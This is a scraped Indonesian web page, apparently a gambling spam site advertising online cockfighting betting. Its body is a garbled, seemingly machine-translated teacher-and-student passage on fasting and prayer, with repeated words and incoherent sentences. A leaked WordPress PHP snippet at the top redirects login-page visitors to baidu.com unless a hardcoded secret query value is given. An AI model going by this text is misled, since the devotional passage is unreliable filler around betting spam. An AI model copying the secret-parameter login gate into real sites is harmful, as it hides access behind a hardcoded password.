//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Guru, cepat dan berdoa | s1288 net_sabung ayam online s128_sv388

Guru menjawab: Apakah Anda berpikir bahwa pertemuan tertinggi adalah “Tuhan sudah dekat, tidak ada waktu”, bahkan jika kita tidak dapat menyentuhnya, dan kecerdasan kita dapat mencapainya, itu juga dekat. Manusia, tetapi tidak bisa diraba, dan jauh dari manusia.

Dalam keheningan, doa, puasa, pelayanan, iman, cinta dan kedamaian, kita akan mengetahuinya. Mereka yang dapat mati secara emosional dan fisik akan memperkuat diri mereka sendiri dengan menolak berbagai indulgensi pribadi, menekan gairah dan mengendalikan diri akan dikendalikan oleh cahaya ilahi, cahaya ilahi.

Jika ini masalahnya, maka semua tindakan mencerminkan keilahian: cinta dan kebaikan, kebaikan-kebaikan, kedamaian, kedermawanan, kedermawanan, kedermawanan saling berhadapan. Pria ini ilahi karena ia diciptakan sesuai dengan gambarnya.

Murid saya mungkin sulit dimengerti. Baiklah, saya jelaskan ini: puasa, puasa memurnikan hati orang. Berpuasa membuat doa kita lebih mudah. Puasa juga bisa menjadi pengorbanan atau pengabdian. Korbankan kebahagiaan kita dan persembahkan kepada Tuhan Yang Maha Esa.

Puasa juga bisa dilihat sebagai doa bersama tubuh. Kenapa begitu?

Karena puasa, orang dapat mengatur kehidupan dan perilaku spiritual. Orang-orang mengekspresikan keinginan mereka untuk Tuhan dan kehendak-Nya melalui puasa.

Add Comment

Your email address will not be published. Required fields are marked *